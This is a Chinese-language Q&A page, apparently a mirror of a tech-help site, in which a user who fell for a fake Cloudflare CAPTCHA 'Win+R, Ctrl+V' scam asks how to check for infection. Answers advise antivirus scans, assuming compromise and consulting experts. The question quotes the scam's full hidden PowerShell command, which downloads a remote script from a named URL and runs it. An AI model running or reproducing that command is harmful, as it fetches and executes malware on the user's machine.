AskOverflow.Dev

AskOverflow.Dev Logo AskOverflow.Dev Logo

AskOverflow.Dev Navigation

  • 主页
  • 系统&网络
  • Ubuntu
  • Unix
  • DBA
  • Computer
  • Coding
  • LangChain

Mobile menu

Close
  • 主页
  • 系统&网络
    • 最新
    • 热门
    • 标签
  • Ubuntu
    • 最新
    • 热门
    • 标签
  • Unix
    • 最新
    • 标签
  • DBA
    • 最新
    • 标签
  • Computer
    • 最新
    • 标签
  • Coding
    • 最新
    • 标签
主页 / computer / 问题 / 1893007
Accepted
Ian Y.
Ian Y.
Asked: 2025-04-21 11:00:24 +0800 CST2025-04-21 11:00:24 +0800 CST 2025-04-21 11:00:24 +0800 CST

如何检测我的计算机是否感染了 Win+R Ctrl+V 骗局病毒?

  • 772

有骗子在 GitHub 上传播诈骗链接,指向一个伪造的 Cloudflare 验证码网页,该网页指示我按⊞ Win+R键,Ctrl+V键,然后点击Enter。我按照指示操​​作,但什么也没发生。

我很快就意识到这是一个骗局。我怎么知道我的电脑是否感染了该骗局的病毒?

它指示我粘贴的一行诈骗代码如下。下面有位用户评论建议将代码分成两行,以防止有人误用。

powershell
 -WindowStyle Hidden -Command ([ScriptBlock]::Create((irm https://jaihind.edu.in/weatherdolphin/dollrandom))).Invoke(); Write-Host   "                                                    Cloudflare. inc.  Captcha-ID:1488                                   ";```
powershell
  • 2 2 个回答
  • 112 Views

2 个回答

  • Voted
  1. Rohit Gupta
    2025-04-21T14:59:41+08:002025-04-21T14:59:41+08:00

    要检测您的电脑是否已被感染,请安装并运行信誉良好的病毒扫描程序/恶意软件检测器。市面上有很多免费版本。

    我在 Windows 上使用 MalwareBytes,在手机上使用卡巴斯基。

    • 2
  2. Best Answer
    Destroy666
    2025-04-22T06:22:48+08:002025-04-22T06:22:48+08:00

    首先,如果网站要求你执行任何浏览器以外的操作,并且你不知道自己在做什么,就不要这么做。尤其是像 Cloudflare 这样信誉良好的反滥用公司,绝不会要求你运行任何类型的 CLI 命令。它只需要知道你的 IP 地址和浏览器指纹识别的各个部分,就能充分利用其功能。这太粗心了。


    其次,该脚本尝试将一些代码加载到Windows应用程序域中。代码如下:

    • 使用链接文件中的算法和密钥加密
    • 编译为 COFF 汇编映像,原始字节无法轻易读取,需要适当的反编译 - 不幸的是我没有这方面的专业知识

    所以攻击者显然知道自己在做什么,而包含文件的网页仍然在线,并且仍然托管着这些文件。你肯定应该假设自己已经被感染了。


    第三,如果你不完全了解它的功能,就无法检测到它。它甚至可能只是一种一次性病毒——例如,它会扫描你的文件以查找重要数据,例如密码/账户、电子邮件、加密钱包等等,然后在完成后自行删除——那么使用任何杀毒软件/反恶意软件进行扫描都是无用的。

    否则,防病毒软件可能无法检测到它,它们只知道人们告诉它们知道的内容,启发式算法也无法检测到所有内容。

    如果机器很重要,可能需要/建议联系安全专家。或者至少找个能告诉你脚本运行时机器到底发生了什么的人——这比用随机应用程序扫描要可靠得多。

    • 2

相关问题

  • 如何将变量字符串放入powershell中的数组?

  • Powershell 和正则表达式:Notepad++“保存时备份”文件列表。编辑名称,按上次写入时间排序

  • 将前景颜色添加到 Powershell 配置文件?

  • 禁用后无法启用 Microsoft Print to PDF

  • 我可以让这个 PowerShell 脚本接受逗号吗?

Sidebar

Stats

  • 问题 205573
  • 回答 270741
  • 最佳答案 135370
  • 用户 68524
  • 热门
  • 回答
  • Marko Smith

    如何减少“vmmem”进程的消耗?

    • 11 个回答
  • Marko Smith

    从 Microsoft Stream 下载视频

    • 4 个回答
  • Marko Smith

    Google Chrome DevTools 无法解析 SourceMap:chrome-extension

    • 6 个回答
  • Marko Smith

    Windows 照片查看器因为内存不足而无法运行?

    • 5 个回答
  • Marko Smith

    支持结束后如何激活 WindowsXP?

    • 6 个回答
  • Marko Smith

    远程桌面间歇性冻结

    • 7 个回答
  • Marko Smith

    子网掩码 /32 是什么意思?

    • 6 个回答
  • Marko Smith

    鼠标指针在 Windows 中按下的箭头键上移动?

    • 1 个回答
  • Marko Smith

    VirtualBox 无法以 VERR_NEM_VM_CREATE_FAILED 启动

    • 8 个回答
  • Marko Smith

    应用程序不会出现在 MacBook 的摄像头和麦克风隐私设置中

    • 5 个回答
  • Martin Hope
    Vickel Firefox 不再允许粘贴到 WhatsApp 网页中? 2023-08-18 05:04:35 +0800 CST
  • Martin Hope
    Saaru Lindestøkke 为什么使用 Python 的 tar 库时 tar.xz 文件比 macOS tar 小 15 倍? 2021-03-14 09:37:48 +0800 CST
  • Martin Hope
    CiaranWelsh 如何减少“vmmem”进程的消耗? 2020-06-10 02:06:58 +0800 CST
  • Martin Hope
    Jim Windows 10 搜索未加载,显示空白窗口 2020-02-06 03:28:26 +0800 CST
  • Martin Hope
    andre_ss6 远程桌面间歇性冻结 2019-09-11 12:56:40 +0800 CST
  • Martin Hope
    Riley Carney 为什么在 URL 后面加一个点会删除登录信息? 2019-08-06 10:59:24 +0800 CST
  • Martin Hope
    zdimension 鼠标指针在 Windows 中按下的箭头键上移动? 2019-08-04 06:39:57 +0800 CST
  • Martin Hope
    jonsca 我所有的 Firefox 附加组件突然被禁用了,我该如何重新启用它们? 2019-05-04 17:58:52 +0800 CST
  • Martin Hope
    MCK 是否可以使用文本创建二维码? 2019-04-02 06:32:14 +0800 CST
  • Martin Hope
    SoniEx2 更改 git init 默认分支名称 2019-04-01 06:16:56 +0800 CST

热门标签

windows-10 linux windows microsoft-excel networking ubuntu worksheet-function bash command-line hard-drive

Explore

  • 主页
  • 问题
    • 最新
    • 热门
  • 标签
  • 帮助

Footer

AskOverflow.Dev

关于我们

  • 关于我们
  • 联系我们

Legal Stuff

  • Privacy Policy

Language

  • Pt
  • Server
  • Unix

© 2023 AskOverflow.DEV All Rights Reserve